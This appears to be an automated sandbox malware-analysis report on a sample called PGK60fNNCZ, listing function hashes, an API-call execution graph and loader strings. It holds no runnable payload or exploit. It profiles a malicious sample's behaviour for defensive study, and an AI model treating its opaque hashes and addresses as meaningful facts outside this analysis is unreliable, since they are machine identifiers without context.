                                                            • Opcode ID: d7b26c9bfd3f98645df12268030c2a2cf1d7a714ddcb96353c5a24d3b0813b1b
                                                            • Instruction ID: 8f3eeb011e23c0b2d1d880dc31fae65d6a83171aab86875ae7d27f129e5c61db
                                                            • Opcode Fuzzy Hash: d7b26c9bfd3f98645df12268030c2a2cf1d7a714ddcb96353c5a24d3b0813b1b
                                                            • Instruction Fuzzy Hash: F3E1F6B4E006598FDB14DFA8C590AAEFBF2BF89304F248169D414AB355D771AD42CFA0
                                                            Function 06EE14B8 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f2f9bfca4a10dad4e93e182c8062c5935606407204a27b4499618aabe5c374d
                                                            • Instruction ID: 36213691a05dcae6aa36d855ec80861ece1ce0611d4c0da1d90cc10ed4814f55
                                                            • Opcode Fuzzy Hash: 3f2f9bfca4a10dad4e93e182c8062c5935606407204a27b4499618aabe5c374d
                                                            • Instruction Fuzzy Hash: BFE1E6B4E002598FDB14DFA9C590AAEFBF2BF89304F248169D414AB355D730AD85CFA1
                                                            Function 06EE1080 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1340778494.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: true
                                                            • Associated: 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b355c72e36726a5caad2bb851188f3cdce5c65368661fcaba77643e6f9b8d7c
                                                            • Instruction ID: 5874a0a3a5ad06a46f709ffe68c000c63915107f7ae20a1227dc525e0ce7cb0b
                                                            • Opcode Fuzzy Hash: 1b355c72e36726a5caad2bb851188f3cdce5c65368661fcaba77643e6f9b8d7c
                                                            • Instruction Fuzzy Hash: CDE1F8B4E002598FDB14DFA9C590AAEFBF2BF89304F248169D414AB355D731AD82CF61
                                                            Function 027CCD24 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6189259f515fcf8080d510c5db994d2e217b64e726e94c8668fd2a2923347720
                                                            • Instruction ID: 4a4143af8e1a9d72bb910f19ef81c4f600525018a2c096fd606ab4e29a84c3d7
                                                            • Opcode Fuzzy Hash: 6189259f515fcf8080d510c5db994d2e217b64e726e94c8668fd2a2923347720
                                                            • Instruction Fuzzy Hash: 51A14B36E006098FCF19DFB4D84459EBBB2FF85300B25856EE806AB261DB35E946CF51

                                                            Execution Graph

                                                            Execution Coverage:1.1%
                                                            Dynamic/Decrypted Code Coverage:5.3%
                                                            Signature Coverage:8.3%
                                                            Total number of Nodes:133
                                                            Total number of Limit Nodes:10
                                                            execution_graph 95346 42c403 95347 42c41d 95346->95347 95350 fd2df0 LdrInitializeThunk 95347->95350 95348 42c445 95350->95348 95351 4250c3 95352 4250df 95351->95352 95353 425107 95352->95353 95354 42511b 95352->95354 95355 42ce23 NtClose 95353->95355 95361 42ce23 95354->95361 95357 425110 95355->95357 95358 425124 95364 42f033 RtlAllocateHeap 95358->95364 95360 42512f 95362 42ce3d 95361->95362 95363 42ce4e NtClose 95362->95363 95363->95358 95364->95360 95365 401b81 95366 401b86 95365->95366 95366->95366 95369 430483 95366->95369 95367 401c1a 95367->95367 95372 42ea93 95369->95372 95373 42eab7 95372->95373 95384 407613 95373->95384 95375 42eae0 95376 42eb3c 95375->95376 95387 41b793 95375->95387 95376->95367 95378 42eaff 95379 42eb14 95378->95379 95402 42d1e3 95378->95402 95398 428993 95379->95398 95382 42eb2e 95383 42d1e3 ExitProcess 95382->95383 95383->95376 95386 407620 95384->95386 95405 416af3 95384->95405 95386->95375 95388 41b7bf 95387->95388 95433 41b683 95388->95433 95391 41b804 95393 41b820 95391->95393 95396 42ce23 NtClose 95391->95396 95392 41b7ec 95394 41b7f7 95392->95394 95395 42ce23 NtClose 95392->95395 95393->95378 95394->95378 95395->95394 95397 41b816 95396->95397 95397->95378 95399 4289f4 95398->95399 95401 428a01 95399->95401 95444 418cb3 95399->95444 95401->95382 95403 42d200 95402->95403 95404 42d211 ExitProcess 95403->95404 95404->95379 95407 416b10 95405->95407 95406 416b29 95406->95386 95407->95406 95412 42d863 95407->95412 95409 416b84 95409->95406 95419 4296b3 NtClose LdrInitializeThunk 95409->95419 95411 416bd5 95411->95386 95414 42d87d 95412->95414 95413 42d8ac 95413->95409 95414->95413 95420 42c453 95414->95420 95419->95411 95421 42c46d 95420->95421 95427 fd2c0a 95421->95427 95422 42c499 95424 42ef13 95422->95424 95430 42d193 95424->95430 95426 42d925 95426->95409 95428 fd2c1f LdrInitializeThunk 95427->95428 95429 fd2c11 95427->95429 95428->95422 95429->95422 95431 42d1b0 95430->95431 95432 42d1c1 RtlFreeHeap 95431->95432 95432->95426 95434 41b69d 95433->95434 95438 41b779 95433->95438 95439 42c4f3 95434->95439 95437 42ce23 NtClose 95437->95438 95438->95391 95438->95392 95440 42c50d 95439->95440 95443 fd35c0 LdrInitializeThunk 95440->95443 95441 41b76d 95441->95437 95443->95441 95445 418cdd 95444->95445 95446 42ef13 RtlFreeHeap 95445->95446 95449 4191eb 95445->95449 95447 418e22 95446->95447 95448 42d1e3 ExitProcess 95447->95448 95447->95449 95448->95449 95449->95401 95457 425453 95462 42546c 95457->95462 95458 4254f9 95459 4254b4 95460 42ef13 RtlFreeHeap 95459->95460 95461 4254c4 95460->95461 95462->95458 95462->95459 95463 4254f4 95462->95463 95464 42ef13 RtlFreeHeap 95463->95464 95464->95458 95465 42ffb3 95466 42ffc3 95465->95466 95467 42ffc9 95465->95467 95470 42eff3 95467->95470 95469 42ffef 95473 42d143 95470->95473 95472 42f00e 95472->95469 95474 42d15d 95473->95474 95475 42d16e RtlAllocateHeap 95474->95475 95475->95472 95450 41b983 95451 41b9c7 95450->95451 95452 41b9e8 95451->95452 95453 42ce23 NtClose 95451->95453 95453->95452 95476 414653 95477 41466d 95476->95477 95479 41468b 95477->95479 95482 417e43 95477->95482 95480 4146d0 95479->95480 95481 4146bf PostThreadMessageW 95479->95481 95481->95480 95483 417e67 95482->95483 95484 417e6e 95483->95484 95485 417ea6 LdrLoadDll 95483->95485 95484->95479 95485->95484 95486 41ac13 95487 41ac85 95486->95487 95488 41ac2b 95486->95488 95488->95487 95490 41eb83 95488->95490 95491 41eba9 95490->95491 95495 41eca0 95491->95495 95496 4300e3 95491->95496 95493 41ec3e 95494 42c453 LdrInitializeThunk 95493->95494 95493->95495 95494->95495 95495->95487 95497 430053 95496->95497 95498 4300b0 95497->95498 95499 42eff3 RtlAllocateHeap 95497->95499 95498->95493 95500 43008d 95499->95500 95501 42ef13 RtlFreeHeap 95500->95501 95501->95498 95454 419408 95455 42ce23 NtClose 95454->95455 95456 419412 95455->95456 95502 fd2b60 LdrInitializeThunk 95503 41415e 95504 4140ea 95503->95504 95507 42d0a3 95504->95507 95508 42d0c0 95507->95508 95511 fd2c70 LdrInitializeThunk 95508->95511 95509 4140f5 95511->95509

                                                            Executed Functions

                                                            Function 00417E43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 215 417e43-417e6c call 42faf3 218 417e72-417e80 call 4300f3 215->218 219 417e6e-417e71 215->219 222 417e90-417ea1 call 42e563 218->222 223 417e82-417e8d call 430393 218->223 228 417ea3-417eb7 LdrLoadDll 222->228 229 417eba-417ebd 222->229 223->222 228->229
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                            • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795
                                                            Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 258 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                            • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4
                                                            Function 00FD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 272 fd2b60-fd2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction ID: 3e764b1e9f245c7651c747a94e849b882e0032962d548aa108ace271c68f3463
                                                            • Opcode Fuzzy Hash: 65f4440766d6128b152e8c64246ceb6c07ab448589714665076529bb71f51e76
                                                            • Instruction Fuzzy Hash: 0990026120244013420571598414616400A87E0741B55C032E1054590EC92989927126
                                                            Function 00FD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction ID: aa0ef7dc569921d01adcd22b94149f9d3583c54bd46764b4a3a2b720793a5fc0
                                                            • Opcode Fuzzy Hash: a51bffae3d9640044632dae73ccc36f5dc1443ec03a74b4fa50e8cb4448e82d6
                                                            • Instruction Fuzzy Hash: BD9002312014C812D2107159C40474A000587D0741F59C432A4464658E8A9989927122
                                                            Function 00FD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction ID: 2805ce5739546bf28ef350ca54bd94a1153e5ae1c88c77c206af936020e35fcb
                                                            • Opcode Fuzzy Hash: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction Fuzzy Hash: D190023120144423D21171598504707000987D0781F95C433A0464558E9A5A8A53B122
                                                            Function 00FD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction ID: 3a94c62ced44d4a3a77684c6d6c9775427a01b8979a48b7f5db9c99936fa5078
                                                            • Opcode Fuzzy Hash: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction Fuzzy Hash: 4890023160554412D20071598514706100587D0741F65C432A0464568E8B998A5275A3
                                                            Function 004145AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4145af-4145c9 1 4145cc-414607 0->1 2 414667-4146bd call 417e43 call 404993 call 425593 1->2 3 414609 1->3 20 4146dd-4146e3 2->20 21 4146bf-4146ce PostThreadMessageW 2->21 5 41460a-41460b 3->5 7 414637 5->7 8 41460d-41461f 5->8 7->5 10 414638-41463a 7->10 8->1 16 414621-414628 8->16 13 414644 10->13 14 41463c-414643 10->14 14->13 18 414635-414636 16->18 19 41462a-414633 16->19 18->7 19->18 21->20 22 4146d0-4146da 21->22 22->20
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                            • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                            • Opcode Fuzzy Hash: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                            • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5
                                                            Function 0041464A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 23 41464a-414685 call 42efb3 call 42f9c3 28 41468b-4146bd call 404993 call 425593 23->28 29 414686 call 417e43 23->29 34 4146dd-4146e3 28->34 35 4146bf-4146ce PostThreadMessageW 28->35 29->28 35->34 36 4146d0-4146da 35->36 36->34
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                            • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5
                                                            Function 00414653 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 37 414653-414665 38 41466d-414685 call 42f9c3 37->38 39 414668 call 42efb3 37->39 42 41468b-4146bd call 404993 call 425593 38->42 43 414686 call 417e43 38->43 39->38 48 4146dd-4146e3 42->48 49 4146bf-4146ce PostThreadMessageW 42->49 43->42 49->48 50 4146d0-4146da 49->50 50->48
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                            • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5
                                                            Function 00417F0B Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 231 417f0b-417f14 232 417ea6-417eb7 LdrLoadDll 231->232 233 417f16-417f1c 231->233 235 417eba-417ebd 232->235 234 417f1d 233->234 236 417f1e-417f2a 234->236 237 417f2c 236->237 238 417eec-417f00 237->238 239 417f2e-417f37 237->239 238->237 241 417f02-417f06 238->241 239->234 240 417f39-417f42 239->240 242 417f45-417fa1 240->242 243 417ecf-417ede 240->243 241->236 244 417f08 241->244 246 417ee0-417ee2 243->246 247 417eeb 243->247 244->234 247->238
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                            • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49
                                                            Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 248 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
                                                            • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8
                                                            Function 0042D193 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 253 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
                                                            • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8
                                                            Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 263 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                            • Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
                                                            • Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                            • Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4
                                                            Function 00FD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 fd2c0a-fd2c0f 269 fd2c1f-fd2c26 LdrInitializeThunk 268->269 270 fd2c11-fd2c18 268->270
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 07feb4c128ab9f82e08a1cced18b8ce04f549aef7413500963ad98cf9c1674e3
                                                            • Instruction ID: ba25199be79a2a86bf2b9e5899b02663973e01eda851ebaa35c227d64bef9462
                                                            • Opcode Fuzzy Hash: 07feb4c128ab9f82e08a1cced18b8ce04f549aef7413500963ad98cf9c1674e3
                                                            • Instruction Fuzzy Hash: 3BB09B72D015C5D5DB51F760460871B790167E0751F19C073D2070651F473CC5D1F1B6

                                                            Non-executed Functions

                                                            Function 01012349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            • Opcode ID: 0901e030fbb789b110ff2392e189557d3206325d906309cdb77c2c0ab0889ce9
                                                            • Instruction ID: 2211725d9287bf67c45c95bd383264be2e91d5973864c16fab637b80dfbb7ce2
                                                            • Opcode Fuzzy Hash: 0901e030fbb789b110ff2392e189557d3206325d906309cdb77c2c0ab0889ce9
                                                            • Instruction Fuzzy Hash: 90929C71608341AFE721DF28C881B6BB7E9BB84750F14482DFAD4DB295D778E844CB92
                                                            Function 00FC8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Critical section address., xrefs: 01005502
                                                            • Critical section address, xrefs: 01005425, 010054BC, 01005534
                                                            • double initialized or corrupted critical section, xrefs: 01005508
                                                            • Address of the debug info found in the active list., xrefs: 010054AE, 010054FA
                                                            • Invalid debug info address of this critical section, xrefs: 010054B6
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054E2
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0100540A, 01005496, 01005519
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01005543
                                                            • 8, xrefs: 010052E3
                                                            • corrupted critical section, xrefs: 010054C2
                                                            • Critical section debug info address, xrefs: 0100541F, 0100552E
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054CE
                                                            • Thread identifier, xrefs: 0100553A
                                                            • undeleted critical section in freed memory, xrefs: 0100542B
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            • API String ID: 0-2368682639
